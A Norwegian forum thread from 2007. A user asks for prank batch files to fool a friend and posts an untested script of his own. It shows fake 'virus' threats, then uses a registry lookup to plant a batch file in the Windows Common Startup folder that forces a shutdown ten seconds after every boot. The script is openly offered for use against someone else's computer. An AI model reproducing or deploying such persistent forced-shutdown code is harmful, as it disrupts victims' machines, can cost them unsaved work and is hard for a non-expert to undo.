pumazz Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 (endret) Har en kamerat som tror han er sinsykt god med data, så jeg har tengt å lure han litt med et uskyldig .bat program... da trenger jeg noen morsomme bat. programmer Jeg har noe men, trenger bla. en komando som skrur av og på skjermen og lignende. Hadde satt pris på mange svar Endret 2. desember 2007 av pumazz Lenke til kommentar
pumazz Skrevet 2. desember 2007 Forfatter Del Skrevet 2. desember 2007 har laga en morsom en, men den må sansynlig hvis korigeres litt... (har ikke turt å prøve den): @echo off cls echo Hvis du lukker dette vinduet kommer PC-en dn til å bli rammet av et veldig farlig virus! bare svar på sporsmaalene saa gaar alt helt fint... Nå kan du skrive inn navnet ditt, og trykke enter to ganger. set /p navn= cls title ... Pause > NUL cls echo Ok, paa det neste sporsmaalet kan du bare svare ja eller nei. Er det forstaatt? set /p string1= IF %string1% equ ja (goto next) else goto end :next echo Bra. echo Synes du det er greit at vi fucker opp PC-en din med et virus? set /p string2= If %string2% equ nei (goto end) else goto end :end echo Nei vel... Det var jo synd for deg... Mohaha... Pause > NUL @echo off @title VIRUS X22 @color 02 cd .. cd .. cd .. tree /F FOR /F "tokens=3* delims= " %%A in ('REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"') do SET startup=%%B set av="%startup%\system.bat"" echo shutdown -s -t 10 -c "Du har 10 sekunder til å si adjø til PC-en din " -f >> %av% Har laga en annen variant og som ikke gjør noe med PC-en din. Den er bare for å skremme Tulle_Virus.zip Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå